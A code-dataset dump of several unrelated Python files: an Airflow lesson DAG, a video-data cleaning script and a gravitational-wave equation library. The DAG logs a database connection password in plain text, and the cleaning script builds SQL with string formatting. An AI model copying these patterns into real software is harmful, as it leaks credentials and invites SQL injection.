復活の場合はテンプレート管理で定義されている変数構造と一致していない変数があるかのチェックまで行う。\r\n if option[\"cmd_type\"] == \"Register\" or option[\"cmd_type\"] == \"Update\":\r\n if retBool is True:\r\n retAry = CommnVarsUsedListUpdate(objDBCA, option, PkeyID, FileID, save_vars_array)\r\n retBool = retAry[0]\r\n retStrBody = retAry[1]\r\n if retBool is False:\r\n return retBool, retStrBody, option\r\n\r\n if option[\"cmd_type\"] == \"Discard\" or option[\"cmd_type\"] == \"Restore\":\r\n \r\n # 廃止の場合、関連レコードを廃止\r\n # 復活の場合、関連レコードを復活\r\n retAry = CommnVarsUsedListDisuseSet(objDBCA, option, PkeyID, FileID)\r\n retBool = retAry[0]\r\n retStrBody = retAry[1]\r\n if retBool is False:\r\n return retBool, retStrBody, option\r\n\r\n table_name = \"T_COMN_PROC_LOADED_LIST\"\r\n data_list = {\"LOADED_FLG\": \"0\", \"ROW_ID\": \"204\"}\r\n primary_key_name = \"ROW_ID\"\r\n objDBCA.table_update(table_name, data_list, primary_key_name, False)\r\n\r\n return retBool, retStrBody, option\r\n","repo_name":"shiota-2021/it-automation2-test","sub_path":"ita_root/common_libs/validate/valid_20403.py","file_name":"valid_20403.py","file_ext":"py","file_size_in_byte":7139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29474603733","text":"'''\nlesson 4 pipelines\nSchedule\n'''\n\nfrom airflow import DAG\nfrom airflow.utils.dates import days_ago\nimport logging\n\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.bash import BashOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom datetime import datetime, timedelta\nfrom airflow.operators.python import ShortCircuitOperator\n\n#from airflow.hooks import PostgresHook\nfrom airflow.hooks.postgres_hook import PostgresHook # хук для работы с GP\nimport logging\nlogging.info(PostgresHook.get_connection('conn_greenplum').password)\n\nDEFAULT_ARGS = {\n 'owner': 'ds',\n 'email': ['sokolartemy@gmail.com'],\n 'email_on_failure': ['sokolartemy@gmail.com'],\n 'retries': 15,\n 
'start_date': datetime(2022, 3, 1),\n    'end_date': datetime(2022, 3, 14),\n    #'sla': timedelta(hours=2),\n    'execution_timeout': timedelta(seconds=300),\n\n}\n\nwith DAG ("a-sokolov-6-lesson-4",\n          schedule_interval='@daily',\ndefault_args=DEFAULT_ARGS,\nmax_active_runs=3,\ndescription = 'ais-description',\ntags=['lesson4', 'ais']\n\n) as dag:\n    dummy = DummyOperator(task_id="dummy")\n    dummy2 = DummyOperator(task_id="dummy2")\n\n    #ddate = datetime.now().weekday()\n    #ddate = datetime.strptime(ds, "%Y-%m-%d").weekday()\n    #ds = kwargs['execution_date']\n    #ds = dag_run.logical_date\n    #ds = {{ execution_date }}\n\n    #ds - execution_date (if you work with Airflow versions prior to 2.2). Nowadays, we just call it logical_date or ds for short. This is one of the many parameters that you can reference inside your Airflow task.\n\n    def week_day(ds=None):\n        # Airflow 2 injects the templated ds string ("YYYY-MM-DD") into matching callable arguments\n        ddate = datetime.strptime(ds, "%Y-%m-%d").weekday()\n        if 6 != ddate: # note, monday is 0, tuesday is 1... so sunday is 6\n            logging.info(f'It is not a sunday {ddate} ')\n            return True\n        else:\n            logging.info(f'It is a sunday {ddate} ')\n            return False\n\n\n    def article(ds=None):\n        ddate = datetime.strptime(ds, "%Y-%m-%d").weekday()\n        day_of_week = ddate + 1 # +1 because the task numbers days as monday=1, tuesday=2, ...\n        logging.info(f'for weekday {day_of_week} :')\n\n        sql_query = f'select heading from articles where id = {day_of_week}'\n\n        pg_hook = PostgresHook(postgres_conn_id='conn_greenplum') # initialise the hook\n        conn = pg_hook.get_conn() # take a connection from it\n        cursor = conn.cursor() # and an (optionally named) cursor\n        if day_of_week != 7:\n            cursor.execute(sql_query) # run the sql\n            query_res = cursor.fetchall() # the full result set\n            one_string = query_res[0][0] # the single value that came back\n            logging.info(f'for weekday {day_of_week} :')\n            logging.info(query_res[0])\n\n\n    articles = PythonOperator(\n        task_id = 'articles',\n        python_callable = article,\n        dag=dag\n    )\n\n    not_sunday = ShortCircuitOperator(\n        task_id = 'not_sunday',\n        python_callable = week_day,\n        dag=dag\n    )\n    not_sunday.doc_md = 'Hi, these are task docs.'\n\n    dummy >> [articles, not_sunday]\n    not_sunday >> dummy2\n","repo_name":"skarfex/education.courses_data_engineer","sub_path":"karpov_airflow_fullrep/dags/a-sokolov-6/a-sokolov-6-lesson-4.py","file_name":"a-sokolov-6-lesson-4.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"20665924284","text":"import os\n\nimport psycopg2\n\nfrom utils import get_length, convert_and_crop_audio, split, make_json\nfrom settings import SQLALCHEMY_DATABASE_URI, CUSTOM_STATIC_PATH\n\n\ndef clean_parts():\n    for root, dir, files in os.walk(CUSTOM_STATIC_PATH):\n        for filename in files:\n            if ".part" in filename:\n                os.remove(os.path.join(root, filename))\n\n\ndef set_length():\n    connection = psycopg2.connect(SQLALCHEMY_DATABASE_URI)\n    cursor = connection.cursor()\n    for root, dir, files in os.walk(CUSTOM_STATIC_PATH):\n        file_keys = set()\n        for filename in files:\n            youtube_id = filename.split('.')[0]\n            if youtube_id not in file_keys:\n                length = get_length(os.path.join(root, filename))\n                cursor.execute("UPDATE videos SET length = {length} WHERE youtube_id = '{youtube_id}' ".format(\n                    length=length, youtube_id=youtube_id))\n                connection.commit()\n                file_keys.add(youtube_id)\n\n\ndef delete_top_1000():\n    filenames = [line.split()[0] for line in open("/home/olga/sorted_sizes.txt").readlines()][:1000]\n    connection = psycopg2.connect(SQLALCHEMY_DATABASE_URI)\n    cursor = connection.cursor()\n    for filename in 
filenames:\n path = os.path.join(CUSTOM_STATIC_PATH, filename[:3], filename)\n try:\n os.remove(path+\".mp4\")\n except:\n pass\n try:\n os.remove(path+\".m4a\")\n except:\n pass\n try:\n os.remove(path+\".webm\")\n except:\n pass\n cursor.execute(\"UPDATE videos SET status = '{status}', skip = TRUE WHERE youtube_id = '{youtube_id}' \".format(\n status=\"deleted\", youtube_id=filename))\n connection.commit()\n\n\ndef create_json_and_wav():\n connection = psycopg2.connect(SQLALCHEMY_DATABASE_URI)\n cursor = connection.cursor()\n for root, dir, files in os.walk(CUSTOM_STATIC_PATH):\n file_keys = set()\n for filename in files:\n youtube_id = filename.split('.')[0]\n if youtube_id not in file_keys:\n if os.path.exists(os.path.join(root, youtube_id+\".m4a\")):\n convert_and_crop_audio(os.path.join(root, youtube_id+\".m4a\"))\n elif os.path.exists(os.path.join(root, youtube_id+\".webm\")):\n convert_and_crop_audio(os.path.join(root, youtube_id+\".webm\"))\n else:\n continue\n if os.path.exists(os.path.join(root, youtube_id+\".mp4\")):\n make_json(os.path.join(root, youtube_id+\".mp4\"))\n else:\n continue\n cursor.execute(\"UPDATE videos SET status = '{status}' WHERE youtube_id = '{youtube_id}' \".format(\n status=\"ready\", youtube_id=youtube_id))\n connection.commit()\n file_keys.add(youtube_id)\n","repo_name":"Veleslavia/yavat","sub_path":"_data_cleaning.py","file_name":"_data_cleaning.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"27340866069","text":"import abc\nimport functools\n\nfrom copy import deepcopy\nfrom fractions import Fraction\n\nimport numpy as np\nfrom numpy import pi\n\nimport astropy.units as u\nfrom astropy.units.quantity import Quantity\nfrom astropy.constants import G, c\n\nfrom matplotlib import pyplot as plt\n\nfrom sympy import (\n Abs,\n Add,\n Eq,\n expand_power_base,\n I,\n lambdify,\n latex,\n Mul,\n Pow,\n powsimp,\n solve,\n Symbol,\n symbols,\n sympify,\n)\nfrom sympy.core.function import _coeff_isneg\n\nfrom . import converters\nfrom .definitions import ALLOWED_VARIABLES, EQN_DEFINITIONS, SUPPLEMENTAL_EQUATIONS\n\ntry:\n from ._version import version as __version__\nexcept ModuleNotFoundError:\n __version__ = \"\"\n\n\n#: dictionary of constants\nCONSTANTS = {\"G\": G, \"c\": c, \"pi\": pi}\n\n\ndef function_call_signature(func):\n \"\"\"\n Decorator function to record the call signature of a function. 
This is\n based on https://www.geeksforgeeks.org/python-get-function-signature/.\n \"\"\"\n\n # get argument variable names\n argnames = func.__code__.co_varnames[: func.__code__.co_argcount]\n\n # get called function name\n fname = func.__name__\n\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n # generate string with function call signature\n funccall = fname + \"(\"\n for item in list(zip(argnames, args[: len(argnames)])) + list(kwargs.items()):\n funccall += f\"{item[0]}=\"\n funccall += f'\"{item[1]}\"' if isinstance(item[1], str) else f\"{item[1]}\"\n funccall += \", \"\n funccall = funccall.strip().rstrip(\",\") + \")\"\n\n # pass signature to function (which should capture it in some way)\n kwargs[\"function_call\"] = funccall\n res = func(*args, **kwargs)\n kwargs.pop(\"function_call\")\n return res\n\n return wrapper\n\n\ndef constfunc(name):\n return CONSTANTS[name]\n\n\n@function_call_signature\ndef equations(equation, **kwargs):\n \"\"\"\n This function generates a :class:`~cweqgen.equations.EquationBase` class\n holding a requested equation. This should always be used to generate an\n equation rather than using the :class:`~cweqgen.equations.EquationBase`\n class itself.\n \"\"\"\n\n if equation.lower() not in list(EQN_DEFINITIONS.keys()) + list(\n SUPPLEMENTAL_EQUATIONS.keys()\n ):\n raise KeyError(f\"Equation '{equation}' is not currently defined\")\n\n # set values for required equation\n eqinfo = (\n EQN_DEFINITIONS[equation.lower()]\n if equation.lower() in EQN_DEFINITIONS\n else SUPPLEMENTAL_EQUATIONS[equation.lower()]\n )\n kwargs[\"equation\"] = equation.lower()\n kwargs[\"equation_variable\"] = eqinfo[\"variable\"]\n kwargs[\"default_fiducial_values\"] = eqinfo[\"default_fiducial_values\"]\n kwargs[\"alternative_variables\"] = eqinfo.get(\"alternative_variables\", [])\n kwargs[\"converters\"] = eqinfo.get(\"converters\", {})\n\n # reference information\n try:\n kwargs[\"reference_string\"] = eqinfo[\"reference\"].get(\"short\", None)\n kwargs[\"reference_eqno\"] = eqinfo[\"reference\"].get(\"eqno\", None)\n kwargs[\"reference_adsurl\"] = eqinfo[\"reference\"].get(\"adsurl\", None)\n kwargs[\"reference_bibtex\"] = eqinfo[\"reference\"].get(\"bibtex\", None)\n except KeyError:\n # no references given\n pass\n\n kwargs[\"latex_string\"] = eqinfo[\"latex_string\"]\n kwargs[\"description\"] = eqinfo[\"description\"]\n\n kwargs[\"rhs_latex_strings\"] = {}\n for key in kwargs[\"default_fiducial_values\"]:\n kwargs[\"rhs_latex_strings\"][key] = (\n ALLOWED_VARIABLES[key][\"latex_string\"] if key in ALLOWED_VARIABLES else key\n )\n\n # check whether generating an equation from parts of from a chain\n parts = eqinfo.get(\"parts\", None)\n\n # generate equation\n if parts is not None:\n if isinstance(parts, dict):\n # convert dictionary into list of tuples\n parts = [(k, v) for k, v in parts.items()]\n kwargs[\"parts\"] = parts\n else:\n chain = eqinfo[\"chain\"]\n\n # get start equation, given by the first item in chain\n try:\n eq = equations(chain[0])\n except Exception as e:\n raise RuntimeError(f\"Could not generate first equation in a chain: {e}\")\n\n eqother = None\n for link in chain[1:]:\n # split into parts\n linkparts = link.split()\n\n if len(linkparts) != 2:\n raise ValueError(\"chain components must contain 2 values\")\n\n if \"equals\" == linkparts[0].strip().lower():\n # an equality\n eqother = equations(linkparts[1].strip())\n elif \"rearrange\" == linkparts[0].strip().lower():\n # rearrange\n varname = linkparts[1].strip().lower()\n\n if eqother is 
not None:\n eq = eq.rearrange(varname, equal=eqother)\n eqother = None\n else:\n eq = eq.rearrange(varname)\n elif \"substitute\" == linkparts[0].strip().lower():\n # substitute\n subeqname = linkparts[1].strip().lower()\n subeq = equations(subeqname)\n\n eq = subeq.substitute(eq)\n\n kwargs[\"parts\"] = eq.parts\n\n eq = EquationBase(**kwargs)\n\n # update the equation docstring\n try:\n # construct doctring\n eq.__doc__ = f\"\"\"\n{eqinfo[\"description\"]}.\n\n:param str equation: \"{equation.lower()}\"\n\"\"\"\n for k, v in eqinfo[\"default_fiducial_values\"].items():\n eq.__doc__ += f\":keyword float or ~astropy.units.quantity.Quantity {k}: {ALLOWED_VARIABLES[k]['description']}. The default value is {v}.\"\n if \"aliases\" in ALLOWED_VARIABLES[k]:\n eq.__doc__ += (\n \" Alternative keyword names are: \"\n + \", \".join(\n f'\"**{alias}**\"'\n for alias in ALLOWED_VARIABLES[k][\"aliases\"]\n if alias != k\n )\n + \".\"\n )\n eq.__doc__ += \"\\n\"\n except KeyError:\n pass\n\n # return the equation class\n return eq\n\n\nclass EquationBase:\n __metaclass__ = abc.ABCMeta\n\n def __init__(self, **kwargs):\n \"\"\"\n Base class for holding equations.\n \"\"\"\n\n self.kwargs = deepcopy(kwargs) # store copy of initial kwargs\n\n self.equation_name = kwargs.pop(\"equation\")\n self.variable = kwargs.pop(\"equation_variable\")\n\n # a list of tuples containing parts of equation\n self.parts = kwargs.pop(\"parts\")\n\n # dictionary to hold default fiducial values\n self.default_fiducial_values = kwargs.pop(\"default_fiducial_values\")\n\n # list containing additional keyword values that can be used\n self.alternative_variables = kwargs.pop(\"alternative_variables\", [])\n\n # dictionary of functions to convert from additional values into\n # required values (keyed on the required values)\n self.converters = kwargs.pop(\"converters\", {})\n\n self.latex_name = kwargs.pop(\"latex_string\") # lhs of equation\n self.description = kwargs.pop(\"description\")\n\n # LaTeX strings for RHS of equation\n self.rhs_latex_strings = kwargs.pop(\"rhs_latex_strings\")\n\n self.values = self.parse_kwargs(**kwargs)\n\n # get simple format reference\n self.reference_string = kwargs.pop(\"reference_string\", None)\n\n # equation number in reference\n self.reference_eqno = kwargs.pop(\"reference_eqno\", None)\n\n # URL of reference in ADS\n self.reference_adsurl = kwargs.pop(\"reference_adsurl\", None)\n\n # BibTeX for reference (from ADS)\n self.reference_bibtex = kwargs.pop(\"reference_bibtex\", None)\n\n # get function call for equations function\n self.equations_call = kwargs.get(\"function_call\", None)\n\n # make sure Sympy version of equation is generated\n _ = self.sympy_var\n _ = self.constant\n\n def parse_kwargs(self, **kwargs):\n \"\"\"\n Get the required values for the specific equation.\n \"\"\"\n\n values = {}\n\n for key in (\n list(self.default_fiducial_values.keys()) + self.alternative_variables\n ):\n value = self.check_for_alias(key, **kwargs)\n if value is not None:\n values[key] = value\n\n # perform conversions if required\n for key in self.converters:\n if key not in values:\n try:\n if callable(self.converters[key]):\n values[key] = self.converters[key](**values)\n else:\n if self.converters[key] in converters.__dict__:\n values[key] = converters.__dict__[self.converters[key]](\n **values\n )\n else:\n raise ValueError(\n f\"Converter function {self.converters[key]} is not recognised\"\n )\n except ValueError:\n pass\n\n return values\n\n @staticmethod\n def check_for_alias(key, 
**kwargs):\n \"\"\"\n Check whether any alias of the key is given in the keyword arguments.\n \"\"\"\n\n # check aliases\n if key in ALLOWED_VARIABLES:\n aliases = ALLOWED_VARIABLES[key][\"aliases\"]\n else:\n aliases = [key]\n\n for alias in aliases:\n if alias in kwargs:\n value = kwargs[alias]\n\n # check value has compatible units\n if key in ALLOWED_VARIABLES:\n if not isinstance(value, Quantity):\n if ALLOWED_VARIABLES[key][\"units\"] is not None:\n value *= u.Unit(ALLOWED_VARIABLES[key][\"units\"])\n else:\n value = Quantity(value)\n elif (\n isinstance(value, Quantity)\n and ALLOWED_VARIABLES[key][\"units\"] is not None\n ):\n try:\n _ = value.to(ALLOWED_VARIABLES[key][\"units\"])\n except (u.UnitConversionError, ValueError) as e:\n raise IOError(\n f\"{ALLOWED_VARIABLES[key]['description']} units are not compatible:\\n{e}\"\n )\n\n # check value has correct sign\n if ALLOWED_VARIABLES[key][\"sign\"] is not None:\n varray = np.asarray(value.value)\n try:\n thresh = len(varray)\n except TypeError:\n thresh = None\n\n strrep = (\n \"np.array(\"\n + np.array2string(varray, separator=\", \", threshold=thresh)\n + \")\"\n )\n\n if not eval(\n \"np.all(\" + strrep + ALLOWED_VARIABLES[key][\"sign\"] + \")\"\n ):\n raise ValueError(\n f\"{ALLOWED_VARIABLES[key]['description']} does not have the correct sign\"\n )\n\n return value\n\n return None\n\n def calculate_fiducial(self, **kwargs):\n \"\"\"\n Calculate and return the product of the fiducial components of the\n equation (excluding the constants) in SI units.\n\n Keyword arguments can be passed using the keys of the\n :attr:`.EquationBase.default_fiducial_values` giving the values at\n which to perform the calculation. Otherwise the default values, or\n values set at initialisation are used. These can be 1d arrays. If\n the arrays have different lengths, or the \"mesh\" keyword argument\n is given and is True, then a mesh grid will be created over the\n space and the values returned on that mesh. 
If arrays of equal\n        length are given, and the \"mesh\" keyword is not given, then values\n        will be calculated for each set of equivalently positioned\n        values in the arrays.\n        \"\"\"\n\n        # fiducialunits = 1.0\n        funcargs = {}\n        arglens = []  # store lengths of arguments\n\n        self._unitdic = {}\n\n        values = self.parse_kwargs(**kwargs)\n\n        for key in self.var_names:\n            if key in values:\n                # use provided value\n                val = values[key]\n            else:\n                val = self.default_fiducial_values[key]\n\n            if not isinstance(val, Quantity):\n                val = Quantity(val)\n\n            funcargs[key] = (\n                np.abs(val.si) if ALLOWED_VARIABLES[key][\"sign\"] == \">= 0\" else val.si\n            )\n\n            try:\n                arglens.append(len(funcargs[key]))\n            except TypeError:\n                arglens.append(1)\n\n        # check whether multiple values are arrays and create a mesh if\n        # necessary\n        usemesh = kwargs.get(\"mesh\", False)\n        mesh = None\n        if sum([length > 1 for length in arglens]) > 1:\n            idx = np.argwhere(np.array(arglens) > 1).flatten()\n\n            # create mesh if \"mesh\" is True or arguments have different lengths\n            if usemesh or not np.all(\n                (np.array([arglens[i] for i in idx]) - arglens[idx[0]]) == 0\n            ):\n                keys = [list(funcargs.keys())[i] for i in idx]\n\n                mesh = np.meshgrid(*[funcargs[key] for key in keys])\n                for i, key in enumerate(keys):\n                    funcargs[key] = mesh[i].flatten()\n\n        # evaluate equation (loop through each part)\n        fiducial = 1.0\n        for key in funcargs:\n            eveq = self._sympy_var_lambda[key](**{key: funcargs[key]})\n            # NOTE: can't use *= as it causes a SegFault\n            fiducial = fiducial * eveq\n\n        if mesh is not None:\n            fiducial = np.reshape(fiducial, mesh[0].shape)\n\n        if isinstance(fiducial, Quantity):\n            return fiducial.si.decompose()\n        else:\n            return fiducial\n\n    def equation(self, displaytype=\"string\", nocomment=False, **latexkwargs):\n        \"\"\"\n        Generate the LaTeX string for the equation.\n\n        Parameters\n        ----------\n        displaytype: str\n            By default this will return a string containing the LaTeX equation\n            text (without bounding \"$\" symbols). If using a Jupyter Notebook\n            this will show as a formatted LaTeX equation. Alternatively, set to\n            \"matplotlib\" to have the output returned as a Matplotlib figure\n            object containing the equation.\n        nocomment: bool\n            By default the output LaTeX string will contain a comment line\n            giving the cweqgen version and call signature from the equations\n            function. To turn this off, set this argument to True.\n        latexkwargs: dict\n            Keyword parameters that can be passed to the\n            :func:`sympy.printing.latex.latex` function. 
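To make the mesh behaviour of calculate_fiducial above concrete, here is a minimal sketch; the equation name and keyword values are illustrative assumptions, not taken from the actual definitions:

import numpy as np

eq = equations("h0")  # assumed equation name
res = eq.evaluate(
    rotationfrequency=np.linspace(10, 1000, 50),  # 50 values
    distance=np.linspace(0.1, 10, 20),            # 20 values
)
# the two arrays have different lengths, so np.meshgrid is used and the
# result is reshaped onto the grid, e.g. with shape (20, 50)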
By default the\n ``fold_frac_powers`` option is set to True, the ``root_notation``\n option is set to False and the LaTeX symbol names are defined by\n the equation definition values.\n \"\"\"\n\n # use powsimp to put values with common exponents together\n seq_const = powsimp(self.sympy_const, force=True)\n seq_var = powsimp(self.sympy_var, force=True)\n\n # set defaults\n symrep = {symbols(key): val for key, val in self.rhs_latex_strings.items()}\n symrep[symbols(self.variable)] = self.latex_name\n\n latexkwargs.setdefault(\"root_notation\", True)\n latexkwargs.setdefault(\"fold_frac_powers\", True)\n latexkwargs.setdefault(\"long_frac_ratio\", 2.0)\n\n mode = latexkwargs.pop(\"mode\", \"plain\")\n delim = \"$\" if displaytype == \"matplotlib\" or mode == \"inline\" else \"\"\n\n if abs(seq_const) != 1:\n latex_equation_const = latex(seq_const, **latexkwargs)\n else:\n latex_equation_const = (\n \"\"\n if seq_const == 1 or ALLOWED_VARIABLES[self.variable][\"sign\"] == \">= 0\"\n else \"-\"\n )\n\n latexkwargs[\"root_notation\"] = False\n latexkwargs.setdefault(\"symbol_names\", symrep)\n latex_equation_var = latex(seq_var, **latexkwargs)\n\n latex_equation = f\"{delim}{self.latex_name} = {latex_equation_const}{latex_equation_var}{delim}\"\n\n if displaytype.lower() == \"matplotlib\":\n return EquationLaTeXToImage(latex_equation)\n else:\n # add LaTeX comment to string with cweqgen version and equations call\n comment = None\n if not nocomment:\n comment = f\"equation generated with cweqgen v{__version__}\"\n if self.equations_call is not None:\n comment += f\":\\n {self.equations_call}\"\n\n return EquationLaTeXString(latex_equation, comment=comment)\n\n @property\n def eqn(self):\n \"\"\"\n The equation as a string.\n \"\"\"\n\n return self.equation()\n\n def __str__(self):\n return str(self.equation())\n\n def __repr__(self):\n return str(self.equation())\n\n def _repr_latex_(self):\n return \"$\" + str(self.equation()) + \"$\"\n\n def fiducial_equation(\n self, dp=2, brackets=\"()\", displaytype=\"string\", nocomment=False, **kwargs\n ):\n \"\"\"\n Generate the LaTeX string for the equation inserting in fiducial values.\n\n Parameters\n ----------\n dp: int\n The number of decimal places to use for non-integer fiducial values.\n brackets: str\n The style of brackets to use, e.g., \"()\", \"{}\" or \"[]\". Defaults is\n round parentheses \"()\".\n displaytype: string\n By default this will return a string containing the LaTeX equation\n text (without bounding \"$\" symbols). If using a Jupyter Notebook\n this will show as a formatted LaTeX equation. Alternatively, set to\n \"matplotlib\" to have the output returned as a Matplotlib figure\n object containing the equation.\n nocomment: bool\n By default the output LaTeX string will contain a comment line\n giving the cweqgen version and call signature from the equations\n function. 
To turn this off, set this argument to True.\n        \"\"\"\n\n        latex_equation = self.latex_name + \" = \"\n\n        # add in coefficient\n        values = deepcopy(self.values)\n        for key, val in kwargs.items():\n            values[key] = val\n        values = self.parse_kwargs(**values)\n\n        coeff = self.evaluate(**values)\n\n        if not isinstance(coeff, Quantity):\n            # convert into Quantity\n            coeff = Quantity(coeff)\n\n        latex_equation += coeff.to_string(precision=(dp + 1), format=\"latex\").replace(\n            \"$\", \"\"\n        )\n\n        if brackets not in [\"()\", \"{}\", \"[]\", None]:\n            raise ValueError(f\"Bracket type {brackets} is not recognised\")\n\n        lbrace = r\"\\left\" + brackets[0] if brackets is not None else \"\"\n        rbrace = r\"\\right\" + brackets[1] if brackets is not None else \"\"\n\n        fiducial = \"\"\n\n        for key in self.var_names:\n            arg = self._sympy_var_parts[key]\n            varlatex = (\n                self.rhs_latex_strings[key]\n                if not isinstance(arg, Pow)\n                else latex(\n                    arg.base, symbol_names={symbols(key): self.rhs_latex_strings[key]}\n                )\n            )\n\n            # get exponent\n            exp = 1 if not isinstance(arg, Pow) else Fraction(*arg.exp.as_numer_denom())\n\n            # get value\n            if key in values:\n                # use provided value\n                val = Quantity(values[key])\n            else:\n                val = Quantity(self.default_fiducial_values[key])\n\n            if exp != 1:\n                # evaluate base for cases such as args being (n + 1)^x\n                val = (\n                    float(arg.base.subs([(symbols(key), val.value)]).evalf()) * val.unit\n                )\n\n            if exp < 0:\n                numerator = val.to_string(precision=(dp + 1), format=\"latex\").replace(\n                    \"$\", \"\"\n                )\n                denominator = varlatex\n            else:\n                denominator = val.to_string(precision=(dp + 1), format=\"latex\").replace(\n                    \"$\", \"\"\n                )\n                numerator = varlatex\n\n            if abs(exp) != 1:\n                expstr = \"^{\" + str(abs(exp)) + \"}\"\n            else:\n                expstr = \"\"\n\n            fiducial += (\n                rf\"{lbrace}\\frac{{{numerator}}}{{{denominator}}}{rbrace}{expstr} \"\n            )\n\n        latex_equation += fiducial\n\n        if displaytype.lower() == \"matplotlib\":\n            return EquationLaTeXToImage(\"$\" + latex_equation + \"$\")\n        else:\n            comment = None\n            if not nocomment:\n                # add LaTeX comment to string with cweqgen version and equations call\n                comment = f\"equation generated with cweqgen v{__version__}\"\n                if self.equations_call is not None:\n                    comment += f\":\\n {self.equations_call}\"\n\n            return EquationLaTeXString(latex_equation, comment=comment)\n\n    def evaluate(self, **kwargs):\n        \"\"\"\n        Evaluate the equation using the given values.\n\n        Keyword arguments can be passed using the keys of the\n        :attr:`.EquationBase.default_fiducial_values` giving the values at\n        which to perform the calculation. Otherwise the default values, or\n        values set at initialisation are used. These can be 1d arrays,\n        where if more than one value is an array, then a mesh grid will\n        be created over the space and the values returned on that mesh.\n\n        Parameters\n        ----------\n        value: bool\n            If value is False (the default) the evaluated equation will be\n            returned as an :class:`astropy.units.Quantity` object. 
If True\n just the values will be returned.\n \"\"\"\n\n const = self.constant\n fid = self.calculate_fiducial(**kwargs)\n\n value = const * fid\n\n if ALLOWED_VARIABLES[self.variable][\"sign\"] == \">= 0\":\n value = np.abs(value)\n\n if isinstance(value, Quantity):\n if not kwargs.get(\"value\", False):\n if ALLOWED_VARIABLES[self.variable][\"units\"] is not None:\n return value.to(ALLOWED_VARIABLES[self.variable][\"units\"])\n else:\n return value.si.decompose()\n else:\n # return as values rather than Quantity object\n return value.si.decompose().value\n else:\n return value\n\n def __call__(self, **kwargs):\n return self.evaluate(**kwargs)\n\n def rearrange(self, newvar, fidval=None, equal=None):\n r\"\"\"\n Rearrange the equation so that a different variable is on the left hand side,\n i.e., solve the equation for the given variable.\n\n Parameters\n ----------\n newvar: str\n The variable should be rearranged to the LHS of the equation.\n fidval: float, Quantity\n The value to use for the original LHS value. If not given this\n will be based on the original fiducial values.\n equal: EquationBase\n You can pass another equation to set as equal to the current\n equation before rearranging.\n\n Returns\n -------\n neweq: EquationBase\n Returns a new equation. The current equation is left unchanged.\n\n Example\n -------\n For example rearrange the braking index equation to put the\n frequency derivative :math:`\\dot{f}` on the left hand side:\n\n >>> eqn = equations(\"brakingindex\")\n >>> reqn = eqn.rearrange(\"rotationfdot\")\n\n which gives:\n\n .. math::\n\n \\dot{f}_{\\rm rot} = \\frac{1}{n^{1/2}} \\left(\\ddot{f}_{\\rm rot} f_{\\rm rot}\\right)^{1/2}\n \"\"\"\n\n if newvar not in self.var_names:\n raise KeyError(f\"{newvar} is not allowed\")\n\n if fidval is None:\n # use current fiducial values to get value of parameter being\n # swapped from LHS\n curval = self.evaluate()\n else:\n curval = fidval\n\n # check whether equating to other equation\n if isinstance(equal, EquationBase):\n if self.variable != equal.variable:\n raise ValueError(\n \"Equation can only be equated if the lhs variable is the same\"\n )\n eq = Eq(equal.sympy.rhs, self.sympy.rhs)\n else:\n eq = self.sympy\n\n # rearrange using solve (use the last value in solution in case two solutions\n # from sqrt). 
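A brief plain-SymPy illustration of why the code just below keeps the last element of the solve() result: for an even power, solve returns both roots with the positive branch last. This sketch is independent of this module:

from sympy import Eq, solve, symbols
x, y = symbols("x y")
print(solve(Eq(y, x**2), x))  # [-sqrt(y), sqrt(y)] -> [-1] picks sqrt(y)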
Expand out any variables with the same powers, so that they form\n        # separate parts of the new equation\n        neweq = expand_power_base(solve(eq, symbols(newvar))[-1], force=True)\n\n        newkwargs = deepcopy(self.kwargs)\n\n        # set new equation parts\n        newkwargs[\"parts\"] = self.generate_parts(neweq)\n\n        newfiducial = newkwargs.pop(\"default_fiducial_values\")\n        newfiducial.pop(newvar)\n        newfiducial[self.variable] = curval\n\n        if isinstance(equal, EquationBase):\n            newfiducial.update(equal.kwargs[\"default_fiducial_values\"])\n        newkwargs[\"default_fiducial_values\"] = newfiducial\n\n        newkwargs[\"latex_string\"] = ALLOWED_VARIABLES[newvar][\"latex_string\"]\n        newkwargs[\"description\"] = ALLOWED_VARIABLES[newvar][\"description\"]\n\n        newkwargs[\"rhs_latex_strings\"].pop(newvar)\n\n        if not isinstance(equal, EquationBase):\n            newkwargs[\"rhs_latex_strings\"][self.variable] = self.latex_name\n        else:\n            newkwargs[\"rhs_latex_strings\"].update(equal.kwargs[\"rhs_latex_strings\"])\n\n        newkwargs[\"equation\"] = newvar  # reset the equation name\n        newkwargs[\"equation_variable\"] = newvar\n\n        # create new EquationBase with updated constants and default fiducial values\n        return EquationBase(**newkwargs)\n\n    def substitute(self, other):\n        r\"\"\"\n        Substitute another equation into the current equation.\n\n        Parameters\n        ----------\n        other: EquationBase\n            The other equation to substitute into the current equation.\n\n        Returns\n        -------\n        neweq: EquationBase\n            Returns a new equation. The current equation is left unchanged.\n\n        Example\n        -------\n        For example put the :math:`h_0` spin-down limit in terms of the\n        braking index :math:`n` and second frequency derivative\n        :math:`\\ddot{f}` (with the help of\n        :meth:`~cweqgen.equations.EquationBase.rearrange`):\n\n        >>> # get braking index equation\n        >>> eqn = equations(\"brakingindex\")\n        >>> # rearrange to put fdot on lhs\n        >>> reqn = eqn.rearrange(\"rotationfdot\")\n        >>> # get h0 spindown equation\n        >>> eqnh0sd = equations(\"h0spindown\")\n        >>> # substitute in the rearranged equation\n        >>> neweq = eqnh0sd.substitute(reqn)\n\n        which gives:\n\n        .. 
